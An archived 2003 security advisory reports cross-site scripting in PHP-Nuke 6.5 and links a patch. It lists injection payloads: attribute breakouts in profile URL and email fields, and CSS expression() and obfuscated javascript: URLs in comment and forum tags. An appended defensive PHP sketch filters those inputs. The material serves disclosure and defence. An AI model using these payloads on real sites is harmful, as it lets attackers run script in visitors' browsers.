PHP-Nuke 6.5 FINAL Cross Site Scripting

From: Frog Man (leseulfrogat_private)
Date: Thu Apr 24 2003 - 14:24:59 PDT


    Information :
    °°°°°°°°°°°°°
    
    Language : PHP
    Website : http://www.phpnuke.org
    Tested Version : 6.5 FINAL
    Problem : Cross Site Scripting
    
    
    Exploit :
    °°°°°°°°°
    In the website or the email of the profile :
    - http://" onclick="[SCRIPT]
    (onclick can be replaced by ondblclick, onhelp, onmouseout, onmousemove,...)
    - " style="list-style:url(javascript:[SCRIPT]); visibility:hidden;
    
    - " style="zoom:expression([SCRIPT]); visibility:hidden;
    
    etc...
    
    
    In private messages (not with phpBB), comments, news, forums,... :
    
    <i style="overflow:expression([SCRIPT]);"></i>
    
    <br style="overflow:expression([SCRIPT]);">
    
    <a style="left:expression([SCRIPT]);"></a>
    
    <a style="background:url('javas&#99;ript:[SCRIPT]');"></a>
    
    <li style="list-style-image:url('javas&#99;ript:[SCRIPT]');">
    
    <b style="background:url('javas&#99;ript:[SCRIPT]');"></b>
    
    etc... with :
    
    - <b>
    - <i>
    - <a>
    - <em>
    - <br>
    - <strong>
    - <blockquote>
    - <tt>
    - <li>
    - <ol>
    - <ul>
    
    
    Patch :
    °°°°°°°
    A patch can be found on http://www.phpsecure.info
    
    
    More Details In French :
    °°°°°°°°°°°°°°°°°°°°°°°°
    http://www.frog-man.org/tutos/PHP-Nuke-html.txt
    
    
    
    frog-m@n
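
A defensive sketch of the two filters this report implies, added here as an example: it is not PHP-Nuke's code and not the phpsecure.info patch. The function names are hypothetical, the tag allowlist is the list from the report, and the sample inputs are the report's strings with the `[SCRIPT]` placeholder left in.

```php
<?php
// Added example: output-side filtering for the two injection points in the report.
// Function names are hypothetical; ALLOWED_TAGS is the tag list from the report.
const ALLOWED_TAGS = ['b', 'i', 'a', 'em', 'br', 'strong', 'blockquote', 'tt', 'li', 'ol', 'ul'];

/** Profile "website" field: keep only absolute http(s) URLs, otherwise return ''. */
function clean_profile_url(string $url): string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : '';
}

/** Render the link; ENT_QUOTES keeps a quote in the value from closing href="...". */
function render_profile_link(string $url): string
{
    $safe = htmlspecialchars(clean_profile_url($url), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return $safe === '' ? '' : "<a href=\"$safe\" rel=\"nofollow\">$safe</a>";
}

/**
 * Comments, news, messages: escape everything, then re-enable only bare
 * allowlisted tags. A tag carrying any attribute (style=, onclick=, ...)
 * never matches the pattern and is shown as inert text.
 */
function clean_comment_html(string $html): string
{
    $escaped = htmlspecialchars($html, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $tags = implode('|', ALLOWED_TAGS);
    // Matches "<b>", "</b>", "<br>", "<br />" in their escaped form only.
    return preg_replace("~&lt;(/?)($tags)\s*/?&gt;~i", '<$1$2>', $escaped);
}

// Constructed sample inputs, taken from the strings quoted in the report.
$comments = [
    '<b>bold</b> text<br>',
    '<i style="overflow:expression([SCRIPT]);"></i>',
    '<a style="background:url(\'javas&#99;ript:[SCRIPT]\');"></a>',
];
foreach ($comments as $c) {
    echo clean_comment_html($c), PHP_EOL;
}
echo render_profile_link('http://" onclick="[SCRIPT]'), PHP_EOL;
echo render_profile_link('http://www.phpnuke.org'), PHP_EOL;
```

A bare `<a>` carries no `href`, so a site that wants clickable links in comments would need a separate path that validates the URL with `clean_profile_url()` before emitting the attribute.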
    
    
    
    
    